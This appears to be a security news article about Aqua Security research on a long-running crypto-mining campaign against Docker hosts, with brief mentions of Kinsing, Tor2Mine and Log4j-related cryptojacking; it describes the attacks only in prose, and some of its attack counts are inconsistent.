A crypto mining campaign, which has been active, has developed its method to avoid detection. The threat actors have evolved their attack method to go undetected, new research today has disclosed.

The crypto mining attack campaign was first uncovered in 2019, and altogether 84 attacks against honeypot servers heaven logged until now. Four of the attacks happened in 2021, report DevSecOps researchers and Aqua security —a cloud security firm. Attacks are rising as 125 attacks have been tracked in Q3 2021.

Initial crypto mining attacks involved executing a malicious command upon running a vanilla image named “alpine:latest” that resulted in the download of a shell script named “autom.sh.”

“Adversaries commonly use vanilla images along with malicious commands to perform their attacks, because most organizations trust the official images and allow their use,” the researchers said in a report shared with The Hacker News. “Over the years, the malicious command that was added to the official image to carry out the attack has barely changed. The main difference is the server from which the shell script autom.sh was downloaded.”

Also read,

The shell script starts the attack sequence, allowing the hacker to make a new user account under the name “akay” and notch up its privileges to a root user. The hacker can now execute arbitrary commands on the compromised machine to mine cryptocurrency.

The campaign’s earlier version in 2019 didn’t focus on camouflage techniques for mining activity, but later versions reflect the developer’s progress as the later versions are good in avoiding detection. And one of the features that stands out is the disabling security mechanisms and fetching an obfuscated mining shell script, and the script is Base64-encoded.

Malware campaigns for overriding computers to mine cryptocurrencies have been led by multiple threat actors such as Kinsing, which has been found scanning the internet for misconfigured Docker servers to break into the unprotected hosts and install a previously undocumented coin miner strain.

“Miners are a low-risk way for cybercriminals to turn a vulnerability into digital cash, with the greatest risk to their cash flow being competing miners discovering the same vulnerable servers,” Sophos senior threat researcher Sean Gallagher noted in an analysis of a Tor2Mine mining campaign, which involves the use of a PowerShell script to disable malware protection, execute a miner payload, and harvest Windows credentials.

In recent weeks, security flaws in the Log4j logging library, as well as vulnerabilities newly uncovered in Atlassian Confluence, F5 BIG-IP, VMware vCenter, and Oracle WebLogic Servers, have been exploited to hijack machines to mine cryptocurrencies, a scheme known as cryptojacking.